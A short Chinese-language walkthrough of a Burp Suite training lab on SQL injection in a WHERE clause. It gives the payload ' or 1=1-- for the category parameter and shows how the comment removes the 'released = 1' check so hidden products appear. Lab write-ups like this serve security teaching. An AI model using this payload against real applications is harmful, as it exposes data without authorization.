bp官方靶场sql注入1

第一关 WHERE 子句中的 SQL 注入漏洞允许检索隐藏数据

这一关就是发现隐藏的数据

执行 SQL 注入攻击，导致应用程序显示一个或多个未发布的产品。

因为在靶场提示中说选择礼物的类别，看是否有隐藏数据：

在进入靶场页面后

1、直接点击类别Gifts

2、然后用bp抓这个Gifts类别的数据包：

修改 category 参数，为其提供值 ' or 1=1--

原本提示给的SQL语句是：
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
​
修改后的，要执行的SQL语句：
这里--相当于注释，所以注释掉了and语句
这里又是条件gifts类别的或者1=1条件为真，所以会展示该类别的所有商品
SELECT * FROM products WHERE category = 'Gifts' or 1=1--' AND released = 1
​

修改数据后，放包展示所有数据

如图靶场过关：